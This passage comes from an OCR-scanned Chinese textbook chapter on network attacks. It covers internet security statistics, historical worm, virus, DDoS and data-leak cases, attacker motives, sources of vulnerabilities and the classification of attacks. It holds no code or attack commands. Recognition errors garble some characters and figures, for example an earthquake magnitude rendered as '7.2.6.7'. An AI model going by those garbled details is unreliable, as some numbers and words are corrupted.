民 的 27.4%); 中 国 域名 总 数 为 4228 万 个 ,网 站 总 数 为 482 万 个 ; 手机 支付 用 户 达 
到 4. 69 亿 , 在 线 下 实体 店 购物 时 使 用 手机 支付 的 网 民有 50. 3%。 
。 截至 2016 年 12 月 ,我 国 的 互联 网 国际 出 口 带宽 已 经 接近 6640Gb/s; IPv4 地 址 数 
量 为 3. 38 亿 ( 由 于 2011 年 2 月 全 球 IPv4 地 址 已 分 配 完毕 ,我 国 IPv4 地 址 自 2011 
年 起 基本 维持 不 变 ),IPv6 地 址 数量 21188 块 /32; 我 国 网 页 数量 达到 2360 亿 个 
(2010 年 底 是 600 亿 个 ) 。 
然而 ,Internet 带 给 我 们 的 绝 不 仅仅 是 海量 的 信息 和 便利 的 生活 。2010 年 , 仅 中 国 遇 到 
过 病毒 或 木马 攻击 的 网 民 就 达 2. 09 亿 , 占 网 民 总 数 的 45. 8%; 账号 或 密码 被 盗 的 网 民有 
9969 万 。2016 年 ,360 安全 中 心 监测 到 中 国 遭 遇 过 网 络 安全 事件 的 用 户 占 比 达 到 整体 网 民 
的 70.5%,2.47 亿 台 PC 感染 过 病毒 木马 程序 ,1. 08 亿 台 安 卓 智 能 手机 感染 恶意 程序 。 中 
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国 互联 网 用 户 面临 的 首要 网 络 安全 问题 是 网 上 诈骗 ,有 39.1% 的 网 民 遭 遇 过 。 

国际 上 几乎 每 20s 就 有 一 起 黑客 事件 发 生 , 仅 美国 每 年 由 黑客 所 造成 的 经 济 损失 就 超 
过 100 亿美 元 。 网 络 的 虚拟 世界 与 现实 世界 之 间 的 界限 变 得 模糊 起 来 , 搅 得 全 球 不 安 ,黑客 
攻击 、 疯 狂 传 播 的 计算 机 病毒 .蠕虫 “钓鱼 网 站 ” 带 来 的 巨大 损失 、 白 领 犯罪 ,信息 站 等 已 经 
渐渐 影响 到 真实 的 生活 。 

综 上 所 述 ,提高 网 络 的 安全 性 成 为 迫切 需要 。 

安全 的 网 络 要 能 够 经 受 住 随时 随地 各 种 各 样 的 网 络 攻 击 , 就 必须 了 解 网 络 攻击 的 手 
段 ,并 据 此 为 网 络 设置 安全 的 “盾牌 ”。 


2.1.1 网 络 攻 击 案例 


“Internet 的 美妙 之 处 在 于 你 和 每 个 人 都 能 互相 连接 ,Internet 的 可 怕 之 处 也 在 于 每 个 
人 都 能 和 你 互相 连接 。” 

1988 年 11 月 , 康 奈 尔 大 学 (Cornell University) 的 研究 生 罗 伯 特 。 塔 潘 。 莫 里 斯 
(Robert Tappan Morris) 研 制 出 一 种 自我 复制 的 蠕虫 (worm), 其 任务 是 确定 互联 网 的 规 
模 。 可 莫 里 斯 无 法 控制 蠕虫 的 复制 ,于 是 一 夜 之 间 , 蠕 虫 感染 了 数 千 台 计算 机 , 约 占 当 时 连 
接 互 联网 的 计算 机 总 数 的 十 分 之 一 。 蠕 虫 造成 了 数 百 万 美元 的 损失 ,也 使 人 们 意识 到 在 
Internet 中 没有 被 充分 考虑 的 网 络 安全 问题 已 经 迫在眉睫 ,美国 政府 针对 此 事件 创建 了 互 
联网 的 应 急 响 应 机 制 ,而 各 种 网 络 通信 协议 也 纷纷 推出 了 加 强 安全 性 的 新 版 本 。 

1999 年 ,大 卫 。 史 密斯 (David L. Smith) 使 用 一 个 资 来 的 美国 在 线 账 号 ,向 美国 在 线 的 
讨论 组 Alt. Sex 发 布 了 一 个 感染 梅 丽 莎 (Melissa) 病 毒 的 Word 文档 。Melissa 是 一 种 迅速 
传播 的 宏 病 毒 , 它 通过 电子 邮件 的 附件 传播 , 梅 丽 莎 病毒 邮件 的 标题 通常 为 “这 是 你 要 的 资 
料 , 不 要 让 任何 人 看 见 (Here is that document you asked for, don't show anybody else)”。 
一 旦 收 件 人 打开 邮件 ,病毒 就 会 向 用 户 通 讯 录 的 前 50 位 好 友 发 送 同 样 的 邮件 。 尽 管 梅 丽 莎 
病毒 不 会 毁坏 文件 或 其 他 资源 ,但 由 于 它 发 出 大 量 的 邮件 ,可 能 导致 企业 或 其 他 邮件 服务 端 
程序 停止 运行 。1999 年 3 月 26 日 爆发 ,感染 了 15%~20% 的 商业 计算 机 ,导致 微软 、 英 特 
尔 、Lockheed Martin 和 Lucent Technologies 等 公司 关闭 了 电子 邮件 网 络 , 造 成 8000 万 美 
元 损失 。 

2006 年 12 月 至 2007 年 1 月 ,武汉 的 李 俊 编写 了 “熊猫 烧香 ?病毒 ,并 通过 网 络 卖 给 120 
多 人 ,每 套 产品 要 价 500 一 1000 元 人 民 币 。 这 些 买 家 改写 后 将 病毒 传播 出 去 ,造成 100 多 万 
台 计 算 机 被 感染 ,自己 则 趁机 资 取 网 友 网 络 游戏 以 及 QQ 账号 进行 出 售 件 利 ,并 使 被 病毒 感 
染 沦陷 的 计算 机 组 成 “僵尸 网 络 ”, 为 一 些 网 站 带 来 流量 。2007 年 9 月 , 李 俊 被 判 有 期 徒刑 
4 年 。 

2010 年 12 月 ,1500 一 2000 名 维基 解密 网 站 的 支持 者 组 成 了 代号 为 “匿名 ”的 黑客 军团 ， 
以 分 布 式 拒绝 服务 (DDoS) 攻 击 方式 ,对 万 事 达 信 用 卡 、Visa 信用 卡 、 贝 宝 (PayPal) 、 瑞 士 邮 
政 银行 等 金融 机 构 的 网 站 展开 攻击 ,报复 它们 切断 “维基 解密 ”的 资金 来 源 。 万 事 达 信用 卡 
公司 网 站 .瑞士 邮政 银行 . 贝 宝 网 络 支 付 系统 一 度 不 能 正常 运行 ,给 用 户 造成 了 严重 的 损失 。 

2010 年 ,www. baidu. com 的 域名 解析 在 美国 域名 注册 商 处 被 非法 自 改 ,导致 全 球 用 户 
不 能 正常 访问 百度 。 

2014 年 1 月 21 日 下 午 3 点 10 分 左右 ,国内 通用 顶级 域 的 根 服务 器 忽然 出 现 异常 , 导 
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致 众多 知名 网 站 出 现 DNS 解析 故障 ,用 户 无 法 正常 访问 。 虽 然 根 服务 器 很 快 恢 复 ,但 由 于 
DNS 缓存 问题 ,部 分 地 区 用 户 * 断 网 ?现象 仍 持续 了 数 个 小 时 ,至 少 有 2/3 的 国内 网 站 受到 
影响 。 根 据 微 博 调查 ,事故 发 生 期 间 , 超 过 85% 的 用 户 遭 遇 了 DNS 故障 、 网 速 变 慢 和 打 不 
开 网 站 的 情况 。 

2016 年 10 月 ,恶意 软件 Mirai 控制 的 僵尸 网 络 对 美国 域名 服务 器 管理 服务 供应 商 Dyn 
发 起 DDoS 攻击 ,这 也 是 美国 遭遇 的 最 大 规模 的 DDoS 攻击 ,导致 美国 东海 岸 地 区 的 许多 网 
站 集体 瘫痪 ,包括 GitHub、Twitter、PayPal 等 ,用户 无 法 通过 域名 访问 这 些 站 点 。 

近 几 年 随 着 网 络 用 户 增加 及 网 络 支付 的 增加 ,网 站 拥有 的 用 户 注册 信息 具有 的 商业 价 
值 越 来 越 大 ,而 相应 的 用 户 信息 泄露 事件 在 国际 和 国内 均 时 有 发 生 , 以 下 是 一 些 案例 。 

2010 年 12 月 ,麦当劳 发 生 消费 者 个 人 资料 泄露 事件 ,原因 是 负责 寄 发 麦当劳 有 关 宣 
传 ,促销 活动 的 Arc Worldwide 公司 把 麦当劳 消费 者 留 下 的 个 人 信息 转 包 给 一 家 电子 邮件 
服务 公司 保存 ,而 该 公司 的 计算 机 资料 库 遭 到 了 黑客 的 人 侵 。 

2010 年 12 月 ,日 本 汽车 制造 商 本 田 汽车 公司 委托 的 一 家 负责 网 站 数据 管理 的 服务 公 
司 遭 到 黑客 人 侵 ,导致 其 在 美国 的 官方 网 站 遭 到 了 黑客 攻击 ,造成 了 大 约 490 万 名 该 网 站 的 
用 户 信 息 外 泄 , 其 中 220 万 名 注册 用 户 的 姓名 .电子 邮件 地 址 、 车 牌号 外 泄 。 

2014 年 4 月 ,国内 某 黑 客 对 国内 两 个 大 型 物流 公司 的 内 部 系统 发 起 网 络 攻击 ,非法 获 
取 快 递 用 户 个 人 信息 1400 多 万 条 ,并 出 售 给 不 法 分 子 。 根 据 媒体 报道 ,该 黑客 是 一 名 22 岁 
的 大 学 生 , 正 在 某 大 学 计算 机 专业 读 大 学 二 年 级 。 

2014 年 5 月 22 日, eBay 要 求 近 1. 28 亿 活 跃 用 户 全 部 重新 设置 密码 ,原因 是 由 于 黑客 
网 络 攻击 ,可 从 该 网 站 获取 密码 .电话 号 码 `. 地 址 及 其 他 个 人 数据 。 而 汽 密 发 生 在 2 月 底 到 
3 月 初 ,eBay 在 5 月 初 才 发 现 。 

2014 年 12 月 25 日, 大量 包含 用 户 账 号 明文 密码 .身份 证 号 码 . 手 机 号 码 和 电子 邮箱 
等 的 12306 用 户 数据 在 互联 网 传播 。 原 因 是 黑客 收集 互联 网 某 游戏 网 站 以 及 其 他 多 个 网 站 
泄露 的 用 户 名 和 密码 信息 ,并 通过 撞 库 的 方式 利用 12306 安全 机 制 的 漏洞 获取 了 13 万 条 用 
户 数据 。 

2015 年 2 月 ,知名 连锁 酒店 桔子 ,锦江 之 星 、 速 八 ,布丁 以 及 高 端 酒店 万 这 酒 店 集团 、 喜 
达 屋 集团 ,洲际 酒店 集团 存在 严重 安全 漏洞 ,房客 的 订单 一 览 无 余 , 包 括 住户 的 姓名 、 家 庭 地 
址 .电话 .邮箱 乃至 信用 卡 后 4 位 等 敏感 信息 ,同时 还 可 对 酒店 订单 进行 修改 和 取消 。 

2015 年 4 月 ,我 国 社保 系统 、 户 籍 查询 系统 、 疾 控 中 心 、 医 院 等 大 量 爆 出 高 危 漏洞 的 省 
市 就 已 经 超过 30 个 ,包含 社保 参 保 信息 、 财 务 ,薪酬 房屋 等 敏感 信息 。 这 些 信息 一 旦 泄露 ， 
不 仅 个 人 隐私 全 无 ,还 可 能 被 犯罪 分 子 利 用 。 

2015 年 5 月 ,美国 国税 局 超过 10 万 名 纳税 人 的 财务 信息 泄露 。 

2015 年 8 月 ,英国 240 万 网 络 用 户 遭 黑客 侵袭 ,加 密 信用 卡 数据 外 泄 ; 9 月 ,英国 400 
万 人 信息 泄露 。 

我 国 国家 旅游 局 漏洞 致 6 套 系统 沦陷 ,涉及 全 国 6000 万 客户 ,6 万 多 旅行 社 账号 密码 、 
百 万 导游 信息 ,通过 该 漏洞 ,能 够 直接 观看 到 每 位 用 户 的 详细 行程 及 个 人 信息 。 攻 击 者 还 可 
利用 该 漏洞 进行 审核 ,拒签 等 操作 。 

2016 年 2 月 以 来 ,敲诈 者 病毒 大 规模 爆发 ,国内 公司 邮箱 收 到 大 量 携带 该 木马 的 邮件 ， 
已 有 上 万 台 计 算 机 被 波及 ,该 勒索 软件 伪装 成 电子 邮件 附件 ,用 户 一 旦 单 击 附件 后 ,其 设备 
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上 所 有 数据 都 会 被 恶意 加 密 , 若 想 重新 解 开 数据 的 密码 ,就 必须 向 该 勒索 软件 研发 者 缴纳 
赎金 。 

2016 年 ,网 上 诈骗 行为 日 益 猩 狐 , 成 为 我 国 互 联网 用 户 面临 的 首要 网 络 安全 问题 。 

开放 的 互联 网 让 用 户 们 不 知道 威胁 会 来 自 哪里 ,但 大 家 都 知道 黑客 ?是 这 些 危险 的 始 
作 俑 者 。 其 实 , 源 自 英语 中 的 单词 hacker 在 早期 的 计算 机 界 带 有 诊 义 ,是 指 热心 于 计算 机 
技术 且 水 平 高 超 的 计算 机 专家 ,尤其 是 程序 设计 人 员 。 而 现在 ,“ 黑 客 " 已 经 成 为 利用 计算 机 
网 络 进 行 破坏 或 非法 牟利 者 的 代名词 ,其 对 应 的 英语 单词 为 cracker, 有 了 时 翻译 成 “ 骇 客 ”, 以 
区 别 早期 的 “黑客 ”。 但 在 我 国 ,更 通用 的 称呼 还 是 “黑客 ”。 

最 早 的 黑客 出 现 于 麻 省 理工 学 院 和 贝尔 实验 室 , 他 们 精通 各 种 计算 机 语言 和 系统 ,热衷 
于 研究 ,发现 计 算 机 和 网 络 的 漏洞 ,喜欢 挑战 高 难度 的 网 络 系统 并 从 中 找到 漏洞 ,然后 向 管 
理 员 提出 解决 和 修补 漏洞 的 方法 。 他 们 在 一 定 程度 上 推动 了 计算 机 和 网 络 的 发 展 ,也 推动 
了 网 络 安全 技术 的 发 展 。 在 欧美 等 国有 合法 的 黑客 组 织 , 黑 客 们 经 常 进行 技术 交流 。1997 
年 11 月 ,在 纽约 召开 了 首届 世界 黑客 大 会 ,参加 人 数 近 5000 人 。 在 Internet 上 ,有 公开 的 
黑客 网 站 ,提供 各 种 自学 材料 和 多 种 免费 黑客 工具 软件 等 。 

20 世纪 90 年 代 , 互 联网 开始 在 全 球 范 围 内 迅速 发 展 ,网 络 与 社会 政治 经济. 文化. 生 
活 等 各 个 方面 的 联系 越 来 越 紧密 ,网 络 的 发 展 催生 了 更 多 的 黑客 。 黑 客 们 的 目的 各 不 相同 ， 
造成 的 后 果 也 有 很 大 差异 。 有 些 黑客 只 是 恶作剧 ,进入 某 些 网 站 后 ,增加 、 删 除 部 分 文字 、 图 
像 ,发 现 网 站 的 安全 漏洞 ,以 显示 高 超 的 技巧 。 有 些 黑客 则 会 在 侵入 网 站 后 ,修改 商品 价格 
等 敏感 信息 ,引发 客户 与 经 营 者 间 的 商业 纠纷 。 还 有 的 修改 别人 的 电子 邮件 信息 ,破坏 甲乙 
双方 的 联系 ,并 借 此 获 利 ; 甚至 为 了 某 些 利益 ,窃取 加 密 的 高 度 敏感 信息 ,进而 影响 企业 其 
至 国家 安全 。 早 期 的 黑客 醉心 于 技术 本 身 ,并 不 关心 政治 ,而 近年 来 ,国际 间 的 政治 纠纷 也 
常常 导致 黑客 对 敌对 国家 政府 网 站 的 攻击 。 

从 某 种 意义 上 说 ,由 黑客 袭击 而 造成 计算 机 网 络 系统 瘫 痰 会 导致 灾难 性 的 后 果 。 在 21 
世纪 ,计算 机 网 络 已 经 成 为 国家 重要 的 基础 设施 ,成 为 社会 基础 的 一 部 分 。 如 果 恐 怖 分 子 袭 
击 一 个 国家 的 核心 信息 系统 ,如 金融 ,商贸 ,交通 .通信 、 军 事 等 系统 以 及 建立 在 其 上 的 经 济 
体系 ,其 后 果 并 不 亚 于 用 核弹 直接 禾 炸 国家 重要 设施 ,将 会 造成 这 个 国家 整个 经 济 基础 的 极 
大 亲 乱 ,达到 “不 战 而 届 人 之 兵 ” 的 目的 。 

有 专家 预测 ,通过 网 络 攻 击 对 手 的 核心 信息 系统 并 使 之 瘫 痰 的 网 络 战 将 成 为 传统 战争 
之 后 的 一 种 全 新 形式 的 战争 ,“ 网 军 ” 有 可 能 成 为 继 陆 、 海 、 空 .天 四 军 之 后 的 又 一 新 兵种 。 专 
家 警告 , 赁 中 国 网 络 技术 现状 ,很 难 抵御 黑客 们 的 攻击 行为 ,而 且 一 旦 遭 到 破坏 ,恢复 起 来 也 
相当 困难 。 那 么 ,中 国 各 种 系统 安全 系数 到 底 有 多 大 ? 让 我 们 来 看 看 国内 网 络 的 现状 。 

我 国 的 许多 网 络 应 用 系统 在 建立 初期 确实 较 少 或 者 根本 就 没有 考虑 安全 防范 措施 ,不 
少 系统 本 身 没 有 认真 处 理 系 统 的 安全 环节 ,就 像 给 人 家 盖 楼 而 没有 给 门窗 配 锁 就 交付 使 用 ， 
是 经 不 起 严格 验收 的 。 因 此 ,有 相当 大 比例 的 网 络 应 用 系统 及 网 站 或 多 或 少 都 存在 着 安全 
漏洞 ,随时 都 有 可 能 遭受 黑客 袭击 。 

大 多 数 国内 的 网 络 提供 商 (ISP) 及 从 政府 到 企业 的 信息 提供 网 站 (ICP) 还 缺乏 有 经 验 
的 安全 员 , 连 黑客 在 网 站 内 筑 了 窝 都 毫 无 察觉 。 很 多 企业 既 没 有 选拔 可 信赖 的 技术 人 员 ,又 
没有 创造 必要 的 条 件 保证 这 些 技 术 人 员 的 稳定 和 技术 上 的 深造 。 对 处 于 这 种 状态 的 政府 网 
络 系统 必须 及 早 采取 措施 。 
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信息 化 给 一 个 国家 带 来 希望 ,也 可 能 带 来 麻烦 。 如 果 信 息 化 不 依靠 科学 决策 ,缺乏 高 技 
术 队 伍 ,这 种 “信息 化 ”必然 是 某 些 因素 误导 的 结果 。 可 以 说 一 些 网 络 工 程 安全 质量 不 能 保 
证 就 仓促 上 网 ,是 商业 利益 驱动 的 结果 。 我 国 不 成 熟 的 网 络 市 场 迫 切 需 要 由 一 批 可 信和 的 专 
家 组 成 网 络 工程 监理 机 构 , 因 此 ,要 从 根本 上 重视 和 保证 网 络 工程 的 安全 及 管理 人 员 的 
培训 。 

此 外 ,由 于 中 国 的 网 站 系统 中 有 相当 一 部 分 采用 了 国外 厂家 的 成 品 或 核心 技术 ,其 安全 
性 更 令 人 怀疑 。 我 国有 关 部 门 已 经 发 现 某 些 进口 的 计算 机 产品 并 不 安全 ,会 以 “远程 维护 ” 
为 借口 故意 留 下 安全 漏洞 ,为 其 幕后 公司 或 组 织 留 下 信息 殖民 的 入 口 。 有 些 操 作 系 统 利用 
网 上 注册 的 名 义 把 用 户 的 信息 发 给 厂商 。 更 有 甚 者 ,在 计算 机 芯片 中 植 人 身份 识别 标记 , 因 
此 ,中 国有 关 部 门 规定 ,为 了 保护 国家 利益 和 经 济 安全 ,禁止 中 国 公司 购买 外 国 设计 的 加 密 
软件 产品 ,国内 任何 组 织 和 个 人 都 不 得 出 售 外 国 商业 性 加 密 产 品 。 

与 此 同时 ,为 了 迎战 国内 外 黑客 的 挑战 ,保障 网 络 应 用 系统 的 安全 ,长 远 而 有 效 的 方法 
就 是 认真 防范 黑客 入 侵 的 同时 积极 发 展 自己 的 计算 机 产业 ,在 技术 上 不 受制 于 人 ,尽快 发 展 
国产 自主 系统 。 


2.1.2 网 络 攻击 的 目的 


攻击 网 络 会 不 会 纯粹 只 是 个 人 兴趣 一 -看 看 是 你 的 * 盾 ”厉害 ,还 是 我 的 * 矛 "厉害 ”不 
排除 有 这 样 的 人 ,早期 的 “黑客 " 们 多 数 确实 是 基于 好 奇 ,从 技术 的 角度 试 着 通过 攻击 发 现 别 
人 网 络 系统 的 漏洞 ; 但 是 现在 互联 网 的 规模 和 影响 力 已 经 使 得 纯 “ 技 术 流 ” 的 黑客 成 为 可 以 
忽略 的 少数 ,多 数 黑客 攻击 网 络 都 有 着 明确 的 目的 。 

1. 窃取 信息 

黑客 进行 攻击 最 直接 、 最 明显 的 目的 就 是 窃取 信息 。 他 们 选 定 的 攻击 目标 往往 有 许多 
重要 的 信息 与 数据 ,窃取 这 些 信息 与 数据 后 ,便于 进行 各 种 犯罪 活动 。 因 此 ,政府 ,军事 、 邮 
电 和 金融 网 络 是 他 们 攻击 的 主要 目标 。 

窃取 信息 并 不 一 定 要 把 信息 带 走 ,还 包括 对 信息 进行 涂改 和 暴露。 涂改 信息 包括 对 重 
要 文件 进行 修改 .更换 和 删除 ,经 过 这 样 的 涂改 ,原来 信息 的 性 质 就 发 生 了 变化 ,不 真实 或 者 
错误 的 信息 给 用 户 带 来 难以 估量 的 损失 ,达到 黑客 进行 破坏 的 目的 ; 暴露 信息 是 指 黑客 将 
窃取 的 重要 信息 发 往 公开 的 站 点 ,由 于 公开 站 点 常常 会 有 许多 人 访问 ,其 他 的 用 户 完全 有 可 
能 得 到 这 些 信息 ,从 而 达到 黑客 扩散 信息 的 目的 ,通常 这 些 信息 是 隐私 或 机 密 。2010 年 ,发 
生 了 沸沸扬扬 的 “维基 解密 ”网 站 创始 人 被 引渡 一 事 ,最 根本 的 原因 大 概 就 是 因为 网 站 上 解 
密 了 很 多 欧美 政府 的 绝密 情报 。 

口令 也 属于 用 户 的 重要 数据 , 当 黑 客 得 到 口令 后 , 便 可 以 顺利 地 登录 到 其 他 主机 ,或 者 
去 访问 一 些 原本 拒绝 访问 的 资源 。 

2. 控制 中 间 站 点 

有 时 ,黑客 们 为 了 更 安全 地 实施 网 络 攻击 ,往往 需要 一 个 中 间 站 点 ,以 免 暴露 自己 的 真 
实 所 在 。 这 样 即使 被 发 现 ,也 只 能 找到 中 间 站 点 的 地 址 ,与 已 无 关 。 因 此 ,他 们 会 在 已 经 进 
入 的 当前 目标 主机 上 和 运行 一 些 程序 :方便 自己 躲 在 幕后 悄悄 地 将 这 台 主 机 变 成 自己 的 “ 枪 
手 ” 去 攻击 其 他 站 点 。 
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3. 获得 超级 用 户 权 限 


侵入 每 个 系统 时 ,黑客 们 都 企图 得 到 超级 用 户 权限 ,这 样 他 就 可 以 完全 隐藏 自己 的 行 
踪 , 并 在 系统 中 埋伏 下 后 门 ,方便 自己 随时 修改 资源 配置 ,为所欲为 。 


2.1.3 网 络 攻 击 的 来 源 


中 国有 句 俗话: 苍蝇 不 叮 无 颖 的 蛋 。 就 是 说 ,自身 有 了 弱点 才 会 给 别人 可 乘 之 机 。 网 
络 也 是 一 样 ,虽然 看 起 来 Internet 规模 庞大 ,用 户 有 数 十 亿 之 众 , 有 无 数 的 聪明 人 建造 并 管 
理 着 它 , 可 实际 上 它 也 有 软肋 。 

1. 网 络 协议 存在 大 量 漏洞 

Internet 采用 的 是 TCP/IP 协议 体系 ,而 TCP/IP 的 最 初 环境 是 ARPAnet ,面向 可 信 
的 .少量 的 用 户 群 体 ( 如 高 校 .研究 所 和 政府 机 关 ) ,因此 在 设计 TCP/IP 时 并 没有 多 考虑 安 
全 方面 的 需求 。 因 而 当 它 被 用 于 开放 的 互联 网 ,用 户 形形色色 完全 不 可 控 之 后 ,TCP/IP 协 
议 自身 的 各 种 弱点 就 会 带 来 许多 直接 的 安全 威胁 。 例 如 : 

。 网 络 层 核 心 协 议 IP 以 分 组 转发 的 方式 从 源 主机 向 目的 主机 传送 数据 ,在 整个 过 程 

中 网 络 上 传输 的 都 是 明文 的 数据 ,并 且 它 仅 依赖 IP 地 址 来 验证 源 主机 和 目的 主机 ， 
缺乏 更 有 效 的 安全 认证 和 保密 机 制 。 

。 在 传输 层 提供 TCP 和 UDP 两 种 协议 ,面向 连接 的 TCP 在 建立 连接 时 虽然 采用 了 
“三 次 握手 ”的 机 制 ,但 TCP 连接 也 能 被 欺骗 、 截 取 和 操纵 。 

UDP 协议 则 更 容易 受到 IP 源 路 由 和 拒绝 服务 的 攻击 。 
应 用 层 的 Finger、FTP Telnet\SMTP .DNS SNMP HTTP 等 协议 也 都 存在 着 与 安 
全 有 关 的 认证 访问 控制 .完整 性 .保密 性 等 问题 。 

2. 网 络 操作 系统 的 漏洞 

网 络 操作 系统 是 网 络 协议 和 服务 得 以 实现 的 最 终 载体 之 一 。 出 于 商业 上 的 考虑 ,现在 
的 网 络 操作 系统 源 代码 都 不 公开 。 随 着 计算 机 硬件 性 能 的 提高 ,网 络 操作 系统 提供 的 功能 
越 来 越 多 ,代码 量 越 来 越 大 ,并 且 网 络 协议 的 实现 本 身 就 很 复杂 ,这 必然 导致 网 络 操作 系统 
存在 种 种 缺陷 和 漏洞 。 

以 个 人 用 户 最 为 熟悉 的 Windows 操作 系统 为 例 , Windows 3. 1 有 300 万 行 代 码 ， 
Windows 95 有 1500 万 行 代码 ,Windows 98 有 1800 万 行 代 码 , 而 Windows XP 有 3500 万 
行 代 码 ,Windows Vista 和 Windows 7 的 代码 都 超过 5000 万 行 。 

大 程序 的 功能 比 它 应 该 包含 的 功能 还 多 ,这 就 是 “大 程序 定理 ”。 在 Windows XP 系统 
上 的 UPnP(Universal Plug and Play, 通 用 即 插 即 用 协议 ) 服 务 的 漏洞 就 曾 被 用 于 导致 缓冲 
区 溢出 `\UDP 欺骗 。 微 软 网 站 上 每 个 公开 发 行 的 软件 和 随后 的 补丁 列表 就 充分 说 明了 
问题 。 

3. 应 用 系统 设计 的 漏洞 

在 设计 应 用 系统 时 ,制造 者 在 硬件 设计 ,芯片 设计 中 有 意 或 无 意 中 留 下 后 门 和 漏洞 ,或 
者 在 应 用 软件 中 留 下 后 门 ,这 些 都 是 常 有 的 事情 。 而 一 旦 这 些 应 用 系统 连接 到 Internet 上 ， 
设计 制造 者 以 及 发 现 了 这 些 漏洞 的 人 都 能 轻易 通过 留 下 的 后 门 和 漏洞 渔 进 客户 的 应 用 系统 
时 ,仅仅 依靠 道德 来 约束 行为 就 不 那么 可 靠 了 。 
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2015 年 8 月 ,微软 在 “补丁 日 ”发 布 了 14 个 安全 公告 ,其 中 4 个 公告 被 评 为 “严重 ”,6 个 
可 能 最 终 导致 远程 代码 执行 。 海 湾 战 争 爆 发 不 久 ,采用 美国 技术 美国 设备 的 伊拉克 军 方 就 
已 经 因此 失去 了 先 机 ,没有 自己 的 核心 技术 ,一 旦 反目 ,自然 是 “人 为 刀 租 ,我 为 鱼肉 ", 这 对 
我 们 无 疑 是 一 个 振 寿 发 联 的 警示 。 

4. 网 络 系统 设计 的 漏洞 

网 络 设计 是 指 某 个 地 区 、 系 统 或 者 一 个 单位 的 内 联网 或 外 联网 的 设计 ,包括 拓扑 结构 的 
设计 和 各 种 网 络 设 备 的 选择 等 。 用 户 往往 对 网 络 的 运营 商 有 过 高 的 信任 ,而 实际 有 些 网 络 
连接 可 能 很 脆弱 。 

例如 , 仅 2015 年 厦门 市 因 各 类 施工 .拆迁 、 装 修 以 及 管道 , 电 杆 破坏 等 造成 的 重要 通信 
光 费 中断 事 故 就 超过 180 起 , 即 平均 每 两 天 就 有 一 起 光缆 中 断 事 故 ,影响 的 宽带 .电话 用 户 
少 则 数 百 户 ,多 则 近 万 户 。2006 年 12 月 26 日 20 时 26 分 和 34 分 ,在 中 国 的 南海 海域 发 生 
7.2.6.7 级 地 震 。 地 震 导致 中 美 海 缆 、 亚 太 1 号 .亚太 2 号 海 缆 .FLAG 海 缆 、 亚 欧 海 缆 、 
FNAL 海 缆 等 多 条 国际 海底 通信 光缆 中 断 , 断 点 在 台湾 以 南 15km 的 海域 ,造成 附近 国家 和 
地 区 的 国际 和 地 区 性 通信 受到 严重 影响 。 通 信 光 缆 完 全 修复 已 经 是 2007 年 1 月 底 了 。 

5. 来 自 网 络 的 恶意 攻击 不 断 

随 着 互联 网 的 发 展 , 早 期 具有 侠 士 风范 的 技术 型 黑客 已 渐渐 淡出 人 们 的 视野 ,新 黑客 们 
似乎 更 适合 被 称 为 “ 骇 客 ”(cracker) ,因为 他 们 更 多 是 在 利用 计算 机 网 络 进行 破坏 或 非法 件 
利 。 同 时 ,病毒 也 从 * 单 机 版 ?进化 到 “网络 版 ”蠕虫 们 开始 横行 网 络 。 

6. 来 自 合法 用 户 的 攻击 

网 络 不 仅 有 “外 患 ”", 还 有 “内 忧 ”, 而 来 自 合法 用 户 的 攻击 是 最 容易 被 管理 者 忽视 的 安全 
威胁 之 一 ,事实 上 ,80% 的 网 络 安 全 事件 与 内 部 人 员 的 参与 相关 。 网 络 管理 的 漏洞 往往 是 导 
致 这 种 威胁 的 直接 原因 。 

上 述 威胁 网 络 安全 的 因素 多 数 是 由 于 互联 网 是 完全 开放 的 网 络 环境 ,其 中 通信 几乎 不 
受 任何 制约 ,因此 ,互联 网 的 开放 性 是 导致 网 络 安全 威胁 最 根本 的 原因 。 而 对 网 络 的 安全 管 
理 不 到 位 更 是 普遍 存在 。 例 如 ,大 量 网 络 用 户 在 安装 系统 和 应 用 软件 时 习惯 采用 默认 安装 、 
默认 配置 ,并 且 出 于 方便 自身 的 原因 使 用 容易 被 字典 攻击 的 “ 弱 口令 ”, 这 些 都 使 得 网 络 安全 
的 形势 更 为 严峻 。 


2.1.4 网 络 攻击 方法 


依据 不 同 的 标准 ,网 络 攻击 方法 有 多 种 分 类 方式 。 

根据 攻击 针对 的 TCP/IP 参考 模型 的 不 同 层 次 ,可 分 为 数据 链 路 层 攻击 、 网 络 层 攻击 、 
传输 层 攻击 和 应 用 层 攻击 。 

本 章 后 面 将 重点 按照 层次 详细 介绍 网 络 攻 击 方法 。 

根据 攻击 时 是 否 主动 修改 信息 ,可 分 为 被 动 攻击 (Passive Attack) 和 主动 攻击 (Active 
Attack) 。 

1. 被 动 攻击 

被 动 攻击 是 指 攻 击 者 只 是 监视 着 被 攻击 方 的 通信 ,但 不 进行 任何 自 改 .拦截 ,通常 被 攻 
击 方 不 易 察觉 ,如 图 2. 1 所 示 。 具 体 的 实现 方法 包括 : 
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。 窃听 。 采 用 嗅 探 软件 Sniffer, 或 直接 搭 线 窃听 


Sniffer 加 

(wiretapping) 。 2 | 目 阴 ” 

。 流 量 分 析 (traffic analysis) 。 通 过 对 通信 业务 流 的 观察 光 1 ) 
(出 现 、 消 失 \ 总 量 \ 方 向 与 频 度 ) 推 断 出 有 用 的 信息 , 比 Da 


如 主机 的 位 置 、 业 务 的 变化 等 。 

被 动 攻击 往往 不 被 重视 ,但 其 搜集 到 的 信息 经 过 筛选 分 析 
后 往往 可 以 形成 很 有 价值 的 情报 。 有 时, 被动 攻击 也 是 在 为 主动 攻击 做 准备 。 

2. 主动 攻击 

主动 攻击 则 是 攻击 者 通过 将 一 些 恶意 代码 (malicious code), 如 病毒 (virus)、 蠕 虫 
(worm) ,特洛伊 木马 (trojan) 恶意 脚本 (Java Script、Java Applet、ActiveX 等 ) 放 和 受害 者 
的 主机 ,从 而 达到 自己 目的 的 行为 ,如 删除 受害 者 资料 、. 盗 取 受 害 者 账号 和 密码 , 算 改 或 虚构 
信息 欺诈 、 对 自身 行为 抵赖 (repudiation) 等 。 

通常 主动 攻击 的 后 果 更 直接 ,也 更 严重 。 


2.1.5 网 络 攻 击 的 过 程 


黑客 实施 网 络 攻 击 首先 要 确定 攻击 的 目标 ,然后 搜集 与 攻击 目标 相关 的 信息 ,寻找 目标 
系统 的 安全 漏洞 ,再 发 动 攻击 。 

1. 确定 目标 

黑客 进行 攻击 ,首先 要 确定 攻击 的 目标 。 例 如 , 某 个 具有 特殊 意义 的 站 点 、 某 个 ISP、 具 
